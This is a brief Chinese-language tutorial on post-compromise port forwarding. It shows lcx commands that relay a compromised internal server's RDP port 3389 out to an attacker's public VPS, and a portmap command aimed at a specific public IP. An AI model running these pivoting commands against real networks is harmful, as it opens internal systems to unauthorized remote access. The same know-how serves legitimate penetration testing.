端口转发

0、简介

偶尔会遇到,拿下了webshell. 远程端口是开启的,但是远程不了,这可能遇到了部署在内网的服务器,终端端口没有映射到公网。这时我们就需要进行内网端口转发, 进而扩大成果。前提是需要一台公网主机,用来监听端口 。

1、lcx 使用方法

首先用公网主机监听 9999 端口,等待接收数据,接收到数据之后把接收到的数据转发到公网主机的 1234 端口。

1
2
3
4
# vps监听 9999 端口,把接收到的数据转发到 1234 端口
lcx.exe -listen 9999 1234
# 内网服务器上转发终端端口 3389 到vps的 9999 端口
lcx.exe -slave vps 9999 localhost 3389

img

img

2、portmap 使用方法

1
./portmap -m 2 -p1 18080 -h2 121.4.69.24  -p2 18081